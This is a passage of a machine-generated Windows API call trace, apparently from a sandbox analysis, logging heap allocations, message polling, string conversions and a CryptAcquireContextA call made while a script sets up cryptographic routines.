hHeap=0x970000) returned 1 [0209.320] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0209.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0209.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0209.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0209.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0209.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0209.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0209.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0209.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0209.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0209.321] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0209.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0209.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0209.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0209.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0209.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0209.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0209.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0209.321] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0209.321] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.321] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0209.322] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0209.322] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e699a8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0209.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0209.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69928, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0209.492] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0209.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0209.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0209.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0209.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0209.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0209.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0209.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0209.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0209.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0209.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0209.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0209.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0209.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0209.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0209.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0209.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0209.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0209.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0209.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0209.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0209.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0209.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0209.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0209.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0209.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0209.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0209.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0209.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0209.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0209.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0209.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0209.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0209.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0209.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0209.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0209.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0209.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0209.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0209.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0209.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0209.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0209.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0209.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0209.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0209.498] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0209.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0209.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0209.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0209.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0209.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0209.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0209.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0209.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0209.498] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0209.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0209.498] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0209.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0209.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0209.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b78 [0209.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0209.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0209.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0209.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0209.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0209.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0209.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0209.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0209.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0209.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0209.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0209.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0209.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0209.499] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0209.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0209.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.499] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0209.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0209.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0209.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0209.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0209.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0209.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0209.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0209.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0209.500] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0209.500] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0209.500] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0209.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0209.500] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0209.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0209.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0209.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0209.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0209.500] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0209.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0209.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0209.500] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0209.501] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0209.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0209.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0209.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0209.502] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0209.502] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0209.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0209.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0209.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0209.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0209.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0209.502] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0209.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0209.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0209.502] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0209.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0209.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0209.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0209.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0209.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0209.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0209.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0209.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0209.503] RtlAllocateHeap 